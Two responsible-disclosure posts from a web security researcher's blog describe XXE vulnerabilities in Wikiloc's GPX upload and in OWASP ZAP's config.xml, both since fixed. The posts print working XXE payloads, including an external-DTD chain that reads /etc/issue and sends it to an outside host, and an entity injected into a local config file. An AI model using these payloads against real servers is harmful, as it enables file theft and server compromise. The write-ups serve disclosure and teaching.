David Sopas – Web Security Researcher

xxe

11/01/16 Advisories # , , ,

Wikiloc XXE vulnerability

Wikiloc XXE vulnerability

For those who still don’t know Wikiloc:

Wikiloc is a place to discover and share the best outdoor trails for hiking, cycling and many other activities.
We are 1,725,606 members exploring and sharing 3,936,841 outdoor trails and 6,503,289 photos.

I was searching for a cool track to ride my bike [yes I love #cycling] and I created an account on Wikiloc.
I already known the site but never registered. Such a cool site in my opinion.

As a security researcher I always take a look on the web applications requests and transactions and after uploading a XML I remember to test Wikiloc for a XXE vulnerability. This is a very dangerous type of vulnerability and could be used by malicious users to compromise the server.

So let me explain what I did:

First I downloaded a .gpx file from Wikiloc to see the structure of the XML.

I injected the following line on top of the file:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://www.davidsopas.com/XXE" > ]>;

And called the entity on the track name:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://www.davidsopas.com/XXE" > ]>
<gpx
 version="1.0"
 creator="GPSBabel - http://www.gpsbabel.org"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xmlns="http://www.topografix.com/GPX/1/0"
 xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd">
<time>2015-10-29T12:53:09Z</time>
<bounds minlat="40.734267000" minlon="-8.265529000" maxlat="40.881475000" maxlon="-8.037170000"/>
<trk>
 <name>&xxe;</name>
<trkseg>
<trkpt lat="40.737758000" lon="-8.093361000">
 <ele>178.000000</ele>
 <time>2009-01-10T14:18:10Z</time>
(...)

I uploaded the .gpx file and voilá! Got a request made by Wikiloc server to my own:

GET 144.76.194.66 /XXE/ 10/29/15 1:02 PM Java/1.7.0_51

To make sure that was your server I resolved the IP which was master.wikiloc.com. I also know what version of Java they were are using – 1.7.0_51.

But to show how dangerous it can be I wanted to test for external DTD and request a file hosted on Wikiloc server – /etc/issue [which will return the operating system used].

So I modified other .gpx file with the following code:

<!DOCTYPE roottag [ 
 <!ENTITY % file SYSTEM "file:///etc/issue">
 <!ENTITY % dtd SYSTEM "http://www.davidsopas.com/poc/xxe.dtd">
%dtd;]>
<gpx
 version="1.0"
 creator="GPSBabel - http://www.gpsbabel.org"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xmlns="http://www.topografix.com/GPX/1/0"
 xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd">
<time>2015-10-29T12:53:09Z</time>
<bounds minlat="40.734267000" minlon="-8.265529000" maxlat="40.881475000" maxlon="-8.037170000"/>
<trk>
 <name>&send;</name>
(...)

xxe.dtd has the following XML code:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://www.davidsopas.com/XXE?%file;'>">
%all;

I uploaded the new .gpx file and got the following GET request on my server:

144.76.194.66 GET /XXE/?Debian 10/29/15 1:12 PM Java/1.7.0_51

With XXE you can do a variaty of things. A malicious user could upload files, check source-code, launch DDoS attacks, you name it.

This issue its already fixed by Wikiloc. They were very fast and concerned about this. It’s shows that they care about security.
Also they provided me with a token of appreciation (they know exactly how to please a cyclist 🙂 ) and also put my name on their contributors list.

wikiloc_gift

Keep up the good work Wikiloc!

no responses
22/09/15 Advisories # , , , ,

OWASP ZAP XXE vulnerability

OWASP ZAP XXE vulnerability

I just noticed that this is my first full disclosure of a XXE vulnerability. I already found others but they were inside private bounty programs.

For those who don’t know OWASP ZAP:

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.
It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.
ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

@ https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

When checking some files from the application I noticed that there are a lot of XML files so I decided to “play” the XXE (XML External Entity) card to check if it OWASP ZAP was vulnerable. I know that finding this type of local vulnerability is a low level issue specially because you need to have access to the local files of the victim but what if the malicious user wants to backdoor the operating system without the trouble of being detected? Cool idea right?

What I done:

  • Opened config.xml on OWASP ZAP local path
  • Added after the <xml> tag the following code:
<!DOCTYPE foo [ 
 <!ELEMENT foo ANY >
 <!ENTITY xxe SYSTEM "http://davidsopas.com/XXE" >]><foo>&xxe;</foo>
  • Saved it and run OWASP ZAP
  • Checking the logs of davidsopas.com I had:

xx.xx.xxx.xxx – – [14/Aug/2015:16:29:05 +0100] “GET /XXE HTTP/1.1” 301 234 “-” “Java/1.8.0_31”

Keep in mind that config.xml is updated when you run the application so the XXE attack is removed automatically cleaning the tracks of a possible malicious user.
Others XML files could also be vulnerable.

I reported this issue to OWASP ZAP guys and they agree with me that it’s not a critical security issue but they fixed it on the version 2.4.2 – https://github.com/zaproxy/zaproxy/issues/1804 – by disabling processing of XML external entities by default.

They were also nice enough to put my name in their acknowledgement list.
If you don’t use OWASP ZAP give it a try. I use it almost everyday. It’s a excellent pentesting tool and with great online support.

one response